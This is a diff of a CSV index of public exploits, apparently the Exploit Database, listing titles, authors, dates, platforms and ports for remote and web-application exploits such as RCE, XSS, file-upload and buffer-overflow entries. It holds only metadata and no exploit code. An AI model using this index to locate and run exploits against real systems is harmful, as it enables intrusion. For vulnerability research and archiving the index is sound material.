-33991,platforms/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - (wysija-newsletters) Unauthenticated Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,php,remote,80 +33991,platforms/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - 'wysija-newsletters' Unauthenticated Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,php,remote,80 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0 34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - 'BKFSim_vhfd.exe' Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010 34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass",2010-05-19,"Nahuel Grisolia",windows,remote,0 @@ -14941,7 +14944,7 @@ id,file,description,date,author,platform,type,port 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting / HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 34385,platforms/linux/remote/34385.txt,"KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution",2010-07-28,unic0rn,linux,remote,0 -34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80 +34390,platforms/php/remote/34390.rb,"HybridAuth - 'install.php' PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 34426,platforms/linux/remote/34426.txt,"uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection",2010-08-05,Chuzz,linux,remote,0 34431,platforms/linux/remote/34431.html,"Nagios XI - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 @@ -15032,7 +15035,7 @@ id,file,description,date,author,platform,type,port 35007,platforms/windows/remote/35007.c,"Native Instruments (Multiple Products) - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0 35011,platforms/linux/remote/35011.txt,"Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting",2010-11-22,"Adam Muntner",linux,remote,0 35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 - WiFi Key Security Bypass",2010-11-24,"Gaurav Saha",hardware,remote,0 -35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Parameter Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 +35018,platforms/linux/remote/35018.c,"Aireplay-ng 1.2 beta3 - 'tcp_test' Length Stack Overflow",2014-10-20,"Nick Sampanis",linux,remote,0 35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService - Arbitrary File Upload (Metasploit)",2014-10-21,Metasploit,windows,remote,0 35033,platforms/php/remote/35033.rb,"Joomla! Component Akeeba Kickstart - Unserialize Remote Code Execution (Metasploit)",2014-10-21,Metasploit,php,remote,80 35034,platforms/multiple/remote/35034.rb,"HP Data Protector - EXEC_INTEGUTIL Remote Code Execution (Metasploit)",2014-10-21,Metasploit,multiple,remote,5555 @@ -15059,7 +15062,7 @@ id,file,description,date,author,platform,type,port 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Executions",2011-01-05,d3c0der,windows,remote,0 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80 -35184,platforms/hardware/remote/35184.py,"Belkin N750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 +35184,platforms/hardware/remote/35184.py,"Belkin N750 - 'jump?login' Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,java,remote,8001 @@ -15069,8 +15072,8 @@ id,file,description,date,author,platform,type,port 35230,platforms/windows/remote/35230.rb,"Microsoft Internet Explorer < 11 - OLE Automation Array Remote Code Execution (Metasploit)",2014-11-13,"Wesley Neelen & Rik van Duijn",windows,remote,0 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing - 'pangoft2-render.c' Heap Corruption",2011-01-18,"Dan Rosenberg",linux,remote,0 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - '.zip' Buffer Overflow",2011-01-19,"C4SS!0 G0M3S",windows,remote,0 -35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 -35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/workingSetManager.jsp workingSet Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 +35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE - 'Help Server help/advanced/searchView.jsp?SearchWord' Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 +35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 35252,platforms/multiple/remote/35252.php,"libxml2 2.6.x - 'XMLWriter::writeAttribute()' Memory Leak Information Disclosure",2011-01-24,"Kees Cook",multiple,remote,0 35273,platforms/windows/remote/35273.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.1 Bypass) (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0 35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 - 'option' HTML Element Integer Overflow",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0 @@ -15086,7 +15089,7 @@ id,file,description,date,author,platform,type,port 40431,platforms/hardware/remote/40431.txt,"NetMan 204 - Backdoor Account",2016-09-27,"Saeed reza Zamanian",hardware,remote,0 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0 35356,platforms/linux/remote/35356.rb,"Hikvision DVR - RTSP Request Remote Code Execution (Metasploit)",2014-11-24,Metasploit,linux,remote,554 -35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime - stconf.nsf/WebMessage messageString Parameter Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote,0 +35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime - '/stconf.nsf/WebMessage?messageString' Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote,0 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime - stconf.nsf Cross-Site Scripting",2011-02-21,"Dave Daly",multiple,remote,0 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0 @@ -15120,7 +15123,6 @@ id,file,description,date,author,platform,type,port 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 -35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",android,remote,0 35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf?jdeowpBackButtonProtect' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService?e1.namespace' Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 @@ -15140,8 +15142,8 @@ id,file,description,date,author,platform,type,port 35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 < 2.2.1.1 - XWork 's:submit' HTML Tag Cross-Site Scripting",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 35740,platforms/windows/remote/35740.txt,"Microsoft .NET Framework JIT Compiler - Optimization NULL String Remote Code Execution",2011-03-04,"Brian Mancini",windows,remote,0 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 - '.au' File Remote Buffer Overflow",2011-05-16,KedAns-Dz,windows,remote,0 -35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - iptm/advancedfind.do extn Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 -35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 - iptm/ddv.do deviceInstanceName Parameter Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 +35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/advancedfind.do?extn' Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 +35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 - 'iptm/ddv.do?deviceInstanceName' Cross-Site Scripting",2011-06-18,"Sense of Security",hardware,remote,0 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 - iptm/eventmon Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 - '/iptm/logicalTopo.do' Multiple Cross-Site Scripting Vulnerabilities",2011-06-18,"Sense of Security",hardware,remote,0 @@ -15214,7 +15216,7 @@ id,file,description,date,author,platform,type,port 36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)",2015-02-27,"Ben Turner",windows,remote,3465 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 -36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,linux,remote,443 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - 'restore.php' Authenticated Command Injection (Metasploit)",2015-03-04,Metasploit,linux,remote,443 36217,platforms/windows/remote/36217.txt,"GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 36218,platforms/windows/remote/36218.txt,"GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting",2011-10-10,"Silent Dream",windows,remote,0 36219,platforms/windows/remote/36219.txt,"GoAhead Web Server 2.18 - 'adduser.asp' Multiple Cross-Site Scripting Vulnerabilities",2011-10-10,"Silent Dream",windows,remote,0 @@ -15238,7 +15240,7 @@ id,file,description,date,author,platform,type,port 36412,platforms/windows/remote/36412.rb,"IPass Control Pipe - Remote Command Execution (Metasploit)",2015-03-16,Metasploit,windows,remote,0 36415,platforms/java/remote/36415.rb,"ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)",2015-03-16,Metasploit,java,remote,9200 36420,platforms/windows/remote/36420.rb,"Adobe Flash Player - PCRE Regex (Metasploit)",2015-03-17,Metasploit,windows,remote,0 -36421,platforms/linux/remote/36421.rb,"Exim GHOST - (glibc gethostbyname) Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 +36421,platforms/linux/remote/36421.rb,"Exim GHOST - glibc gethostbyname Buffer Overflow (Metasploit)",2015-03-18,"Qualys Corporation",linux,remote,25 36480,platforms/multiple/remote/36480.rb,"Mozilla Firefox - Proxy Prototype Privileged JavaScript Injection (Metasploit)",2015-03-24,Metasploit,multiple,remote,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 - Session Tampering Security Bypass",2011-12-07,"Hisato Killing",multiple,remote,0 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras - Cross-Site Scripting",2011-12-07,"Matt Metzger",hardware,remote,0 @@ -15292,14 +15294,14 @@ id,file,description,date,author,platform,type,port 36812,platforms/php/remote/36812.rb,"WordPress Plugin Work The Flow - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",windows,remote,0 36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 - openvpn_users.cgi PATH_INFO Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 -36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 - dnat.cgi createrule Parameter Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 -36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 - dansguardian.cgi addrule Parameter Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 +36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 +36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote,0 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0 37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities",2012-02-21,Busindre,hardware,remote,0 -36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0 +36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - '/webconfig/wan/confirm.html/confirm?pvcName' Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0 36877,platforms/hardware/remote/36877.html,"D-Link DCS - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote,0 36884,platforms/linux/remote/36884.py,"libpurple 2.8.10 - OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote,0 @@ -15340,7 +15342,7 @@ id,file,description,date,author,platform,type,port 37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0 37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,multiple,remote,0 37510,platforms/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",windows,remote,0 -37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 +37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - 'launchAgent.do?return-To' Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0 37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,multiple,remote,0 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0 @@ -15456,7 +15458,7 @@ id,file,description,date,author,platform,type,port 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (SEH)",2015-10-23,Audit0r,windows,remote,0 38535,platforms/osx/remote/38535.rb,"Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)",2015-10-26,Metasploit,osx,remote,0 38644,platforms/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 -38541,platforms/php/remote/38541.rb,"Th3 MMA - mma.php Backdoor Arbitrary File Upload (Metasploit)",2015-10-27,Metasploit,php,remote,80 +38541,platforms/php/remote/38541.rb,"Th3 MMA - 'mma.php' Backdoor Arbitrary File Upload (Metasploit)",2015-10-27,Metasploit,php,remote,80 38549,platforms/multiple/remote/38549.txt,"Apache Struts - OGNL Expression Injection",2013-06-05,"Jon Passki",multiple,remote,0 38554,platforms/android/remote/38554.py,"Samsung SecEmailUI - Script Injection",2015-10-28,"Google Security Research",android,remote,0 38582,platforms/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 @@ -15497,8 +15499,8 @@ id,file,description,date,author,platform,type,port 38726,platforms/hardware/remote/38726.txt,"D-Link DGL5500 - HNAP Buffer Overflow",2015-11-16,"Samuel Huntley",hardware,remote,80 38730,platforms/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 38731,platforms/php/remote/38731.py,"XCart 5.2.6 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 -38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - post2file.php Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,php,remote,9999 -38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - post2file.php Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,php,remote,9999 +38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,php,remote,9999 +38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,php,remote,9999 38741,platforms/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote,0 38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 38764,platforms/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,hardware,remote,443 @@ -15738,7 +15740,6 @@ id,file,description,date,author,platform,type,port 41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0 41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0 41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0 -41160,platforms/windows/remote/41160.py,"Autodesk Backburner Manager 3 < 2016.0.0.2150 - Null Dereference Denial of Service",2017-01-26,b0nd,windows,remote,0 41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0 41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0 41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0 @@ -15778,7 +15779,7 @@ id,file,description,date,author,platform,type,port 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0 -41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 +41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - Unauthenticated 'hidden_lang_avi' Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80 41720,platforms/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0 41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0 41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0 @@ -16581,7 +16582,7 @@ id,file,description,date,author,platform,type,port 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution",2001-01-12,"Marco van Berkum",cgi,webapps,0 289,platforms/cgi/webapps/289.pl,"sendtemp.pl - Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0 -384,platforms/php/webapps/384.txt,"PHP 4.3.7 - (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 +384,platforms/php/webapps/384.txt,"PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0 407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0 @@ -16632,7 +16633,7 @@ id,file,description,date,author,platform,type,port 860,platforms/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper Exploit",2005-03-07,sirius_black,php,webapps,0 862,platforms/cgi/webapps/862.txt,"The Includer CGI 1.0 - Remote Command Execution (1)",2005-03-07,"Francisco Alisson",cgi,webapps,0 864,platforms/php/webapps/864.txt,"phpWebLog 0.5.3 - Arbitrary File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 -865,platforms/php/webapps/865.txt,"PHP mcNews 1.3 - (skinfile) Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 +865,platforms/php/webapps/865.txt,"PHP mcNews 1.3 - 'skinfile' Remote File Inclusion",2005-03-07,"Filip Groszynski",php,webapps,0 866,platforms/php/webapps/866.c,"paNews 2.0b4 - Remote Admin Creation SQL Injection",2005-03-08,Silentium,php,webapps,0 870,platforms/php/webapps/870.txt,"Download Center Lite (DCL) 1.5 - Remote File Inclusion",2005-03-10,"Filip Groszynski",php,webapps,0 871,platforms/php/webapps/871.txt,"phpBB 2.0.12 - Session Handling Authentication Bypass",2005-03-11,Ali7,php,webapps,0 @@ -16661,9 +16662,9 @@ id,file,description,date,author,platform,type,port 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,cgi,webapps,0 1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,php,webapps,0 -1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - Password.asp Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 -1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - Password.asp Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 -1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - Password.asp Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 +1010,platforms/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (3) (Perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 +1011,platforms/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (2) (PHP)",2005-05-26,mh_p0rtal,asp,webapps,0 +1012,platforms/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password Exploit (1) (HTML)",2005-05-26,"Soroush Dalili",asp,webapps,0 1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",php,webapps,0 1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",asp,webapps,0 @@ -16682,7 +16683,7 @@ id,file,description,date,author,platform,type,port 1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - web_store.cgi Remote Exploit",2005-06-15,"Action Spider",cgi,webapps,0 1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash Remote Exploit",2005-06-15,pokleyzz,php,webapps,0 -1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - pafiledb.php Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 +1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password Exploit",2005-06-15,Alpha_Programmer,php,webapps,0 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 1052,platforms/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0 1053,platforms/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,php,webapps,0 @@ -16699,7 +16700,7 @@ id,file,description,date,author,platform,type,port 1076,platforms/php/webapps/1076.py,"phpBB 2.0.15 - 'highlight' PHP Remote Code Execution",2005-06-29,rattle,php,webapps,0 1077,platforms/php/webapps/1077.pl,"WordPress 1.5.1.2 - xmlrpc Interface SQL Injection",2005-06-30,"James Bercegay",php,webapps,0 1078,platforms/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,php,webapps,0 -1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details 